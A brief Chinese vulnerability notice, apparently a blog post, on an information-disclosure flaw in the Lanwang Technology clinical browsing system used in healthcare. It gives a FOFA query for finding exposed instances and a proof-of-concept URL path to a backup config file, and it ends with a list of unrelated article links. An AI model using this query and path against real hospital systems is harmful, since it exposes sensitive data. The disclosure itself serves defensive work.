Nx01 产品简介
蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
Nx02 漏洞描述
蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。
Nx03 产品主页
fofa-query: title=="临床浏览"
Nx04 漏洞复现
POC:
/config/config%20bak.txt
Nx05 修复建议
建议联系软件厂商进行处理。
相关推荐
永乐春秋4 分钟前
WEB攻防-JavaWweb项目&JWT身份攻击&组件安全&访问控制danplus4 分钟前
node发送邮件:如何实现Node.js发信功能?petaexpress11 分钟前
常用的k8s容器网络模式有哪些?小黑爱编程12 分钟前
【LInux】HTTPS是如何实现安全传输的BeyondESH17 分钟前
Linux线程同步—竞态条件和互斥锁(C语言)wn53119 分钟前
【Go - 类型断言】hanniuniu1320 分钟前
详细解读,F5服务器负载均衡的技术优势PatrickYao04221 小时前
记一次安装discuz时遇到的错误云卓科技1 小时前
无人机之控制距离篇云卓科技1 小时前
无人机之飞行高度篇